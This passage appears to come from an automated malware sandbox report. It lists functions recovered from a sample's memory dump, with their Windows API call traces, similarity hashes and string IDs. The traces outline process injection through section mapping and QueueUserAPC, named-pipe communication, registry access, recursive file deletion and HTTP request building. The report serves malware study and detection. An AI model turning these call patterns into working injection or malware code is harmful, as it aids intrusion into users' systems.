  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7341, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76 Total matches: 75stringfilememory
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
